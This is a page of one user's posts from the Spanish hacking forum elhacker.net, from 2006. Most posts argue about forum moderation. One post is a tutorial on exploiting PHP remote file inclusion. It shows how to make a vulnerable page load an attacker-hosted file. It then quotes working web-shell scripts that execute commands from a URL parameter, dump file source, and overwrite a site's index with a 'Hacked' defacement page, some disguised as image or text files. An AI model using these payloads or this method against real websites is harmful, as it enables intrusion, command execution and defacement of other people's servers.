elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11
41  Foros Generales / Sugerencias y dudas sobre el Foro / Re: MMM tambien me Borraron un POST en: 7 Noviembre 2006, 21:05 pm
No empiezen a pelear de nuevo. Ya les dije, si les quitan el post es por algo y si es porque causaba conflictos mejor. Voy de acuerdo con que se foro libre, pero no libre de poner cualquier cosa que se les venga a la mente y pueda causar problemas.

Hyde
42  Foros Generales / Sugerencias y dudas sobre el Foro / Re: MMM tambien me Borraron un POST en: 7 Noviembre 2006, 04:58 am
Calma muchachos que nuestro moderador es nuevo y se va acoplando poco a poco, tengan un poco de paciencia. Mandenle un privado y listo.

Salu2

Hyde
43  Foros Generales / Sugerencias y dudas sobre el Foro / Re: PREGUNTA ¿Como hago para ser Colaborador o Moderador? en: 7 Noviembre 2006, 04:55 am
Ese titulo se gana pero sin pedirlo. Debes ayudar siempre sin buscar con eso que te suban de puesto. La ayuda la brindamos por placer, no por buscar un rango.

Te voy a dar un consejo, no busques ayudar nunca para ser mod o col, mejor ayuda para beneficio de la comunidad, asi te reconoceran mejor.

Salu2

Hyde
44  Seguridad Informática / Nivel Web / Re: Manual de RFI (Remote File Inclusion) en: 4 Noviembre 2006, 20:33 pm
No todas las webs son vulnerables en el mismo sentido, debes probar con muchas y con distintas vulnerabilidades. No vas a encontrar una apenas comenzando, te lleva algo de tiempo...

Se me hace antietico poner aqui algunas que me se, pero te puedo mandar una, que ya no les importa saber nada de ella y la puedes usar de prueba, si quieres por privado.

Salu2

Hyde
45  Seguridad Informática / Nivel Web / Re: Manual de RFI (Remote File Inclusion) en: 3 Noviembre 2006, 21:01 pm
Imagina que lo hubiera hecho... muchos los hubieran usado contra las webs, ademas el fin es que aprendan no que se dediquen a hacerlo por ahi siempre.

Salu2

Hyde
46  Seguridad Informática / Nivel Web / Manual de RFI (Remote File Inclusion) en: 3 Noviembre 2006, 04:53 am
Por principio definamos que RFI significa Remote File Inclusion (Inclusion remota de archivos), esto es producto de una vulnerabilidad en los sitios web a traves de la cual se puede hacer una inclusion de un archivo al server. Para encontrar dichas vulnerabilidades y explotarlas habria que buscarlas con el metodo GET, esto es, ligar los datos a la URL con las variables despues de un signo de interrogacion (?), recordando usar como espacio el singo de mas (+), por ejemplo, cuando usamos el buscador de google nos aparece algo similar a esto:

www.google.com.ar/search?hl=es&ie=UTF-8&q=la+busqueda&meta=

En dicha URL encontramos las siguientes variables: hl, ie, q, meta

No me detendre a explicar el metodo GET y POST en este momento, tratare de hacer un texto mas explicito sobre ellos mas adelante. Para este documento se da por entendido que se tiene un concepto de estos.

Sigamos:

La vulnerabilidad se haria mas o menos asi: index.php?pagina=inicio.php  desde aqui se podrian comenzar con la inclusion de archivos si existe tal bug. Si encontramos alguna que tengamos la idea de que es vulnerable podriamos probarla con nuestro amigo google usando el siguiente camino:

http://www.aquilaweb.com/index.php?variable=http://www.google.com

Si vemos que dentro del sitio se carga la web de google existe la posibilidad de que sea vulnerable dicha web. Para seguir con la vulnerabilidad ahora colocamos lo siguiente:

http.//www.aquilaweb.com/vuln.php?page=http//www.tuweb.com/exploit.gif

Debemos tomar en cuenta que no podemos cambiar la extension a php porque se ejecutaria en nuestro servidor y no en el otro, para hacer esto se debe tener una extension como jpg o gif que deben incluir y el script que se ejecutara en la web victima.

Paseando por la web he encontrado estos scripts:

Citar
<?
/* Este código sirve para ejecutar comandos en el servidor de la web. Esto se hace mediante la siguiente función, que abre la shell y ejecuta el comando que se define por la variable çmd. En este caso es GET para que se pueda definir por la barra de direcciones. También es importante destacar que solo funciona si PHP está configurado con safe_mode OFF*/
$çmd=$_GET[çmd];
system($çmd);
?>


Citar
<?
/* Este archivo muestra el código fuente del archivo que se pasa por el método GET, mediante la variable file. */
$file=$_GET[file];
show_source($file);
?>

Fuente de scripts: texto de Paisterist (no recuerdo la URL exacta)

***


Cambiar el index:

Citar
<?
$fp=fopen("index.php","w+");

fwrite($fp,"<title>Hacked</title>
<body bgcolor="#000000" text="#FF9900">
<center>
<font face="Fixedsys">
<font size="6">Hacked</font><br>
<font size="2">Own yOur B0x!</font>
</center> \n");
fclose($fp);
?>


Otro sencillo ejemplo. Guardar com .gif, .jpg, o .txt y hacer el remote file inclusion con la variable vulnerable y la url de este archivo.

Citar
<?
  // çMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();passthru("$çmd 1> /tmp/çmdtemp 2>&1; cat/tmp/çmdtemp;rm/tmp/çmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>


Fuente: Ejemplos de RFI por el-brujo

***

El texto es totalmente hecho por mi basado en los textos de ambos sujetos. Cualquier publicacion externa debera llevar por lo menos la referencia de quienes han hecho los scripts y mia. Comentarios aqui.

Salu2

Hyde
47  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Tema de colabordador nuevo cerrado... porque?? en: 2 Noviembre 2006, 00:22 am
Pues ahora a esperar si el-jefe nos da una resolucion  ;D

SAlu2 y gracias a todos por dar su punto de vista

Hyde
48  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Tema de colabordador nuevo cerrado... porque?? en: 1 Noviembre 2006, 23:19 pm
Ya entendi eso desde hace tiempo Sdc y pues si asi son las cosas que lastima pero bueno...

Espero que Alex se de una vuelta por aqui para dar su opinion, seria lo mejor supongo.

Ya se que el colaborador no modera el foro pero antes han dicho que para ser cualquier cosa debiste ser colaborador primero no?

Pero bueno no se pongan tan serios y duros que esto es una sugerencia no una exigencia  ;D Ademas sirve para ver el punto de vista de todos y me gustaria conocer el de los demas y de ser posible de aquellos que estamos en esas 6 horas por aqui.

Salu2

Hyde

Pd anda que me tendre que someter a tu dictadura no Sdc jejeje ;D no te pongas asi al final todos pertenecemos al foro y no habria porque comenzar peleas entre nosotros. Te mando un saludo ;D
49  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Quejas Multiples contra miembro del Staff en: 1 Noviembre 2006, 23:07 pm

Sabes que, deberías ir al médico a que te miren bien, porque NUNCA CRECES (y menos mentalmente).


Esto por lo menos para mi es una clara ofensa.

He leido el tema y me he dado cuenta que el staff defiende al staff y que los usuarios nos defendemos entre nosotros. La verdad siento que si la recopilacion la hizo el, EL debe tener por lo menos el derecho de esscribir su nombre no? o ahora resulta que todo lo escrito se le adjudicara a los miembros del staff? en el caso de que uno ellos lo haga claro esta, porque de ser asi muchos otros posts deberian ser modificados.

Estoy de acuerdo con nobalogic, que se le de el credito que merece, el problema no es si se va o no, por mi que se despida cuantas veces quiera, si se queda es por algo y si ayuda es mucho mejor. Nadie, incluido el staff, creo tiene el derecho a decirle a un usuario por una simple discusion que se largue no creen?

Muchos miembros del staff me caen bien, no por que los haya tratado sino porque se dedican a ayudar,  pero otros solo tienen el titulo...

No estoy del lado de nadie, no me gusta estar en un solo bando en una pelea, prefiero ser neutral.

Supongo que esto no lo deberia solucionar nadie mas que Alex.

Salu2

Hyde

PD .:wvb:. no es nada contra ti pero creo que lo que has posteado no va con las normas. Salu2
50  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Tema de colabordador nuevo cerrado... porque?? en: 1 Noviembre 2006, 23:04 pm
No exijo nada Sdc, solo defiendo la idea de poner un nuevo colaborador. No estoy con el afan de que se haga de inmediato ni que haya niñeras por el foro las 24 horas. El otro post no se estaba convirtiendo en una pelea tampoco (odio citar por eso no lo hago  ;D).

Creo que si todo el foro votara por alguien si se haria caso, no creo que dejaran sin opinion a todos nosotros o si?

kretop ya lo dijo, aun no se responde la pregunta de este post ni me han dado una respuesta clara de porque no se podria buscar un nuevo colaborador, solo dan un no "porque tenemos que aprobarlo" y mas no hacen.

Desde el comienzo del post he dejado en claro que esto es una SUGERENCIA si me dan una buena razon por la que no se hara con gusto la acepto y sigo adelante, me olvido de esto. Un incidente no es nada. Que en 6 horas que representan una cuarta parte del dia no haya nadie del staff no es nada. Todo es un hobby como algunos han dicho. Pero por lo menos para mi no lo es... aqui empeze en esto y aqui seguire mientras pueda, por eso pido esto, quiza por que le tengo cariño al foro, cosa que el staff tambien deberia tener(no me refiero a todos)...

Salu2

Hyde

Pd. Otro post cerrado porque se habla del staff... ustedes tendran sus razones pero por lo menos diganlas
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines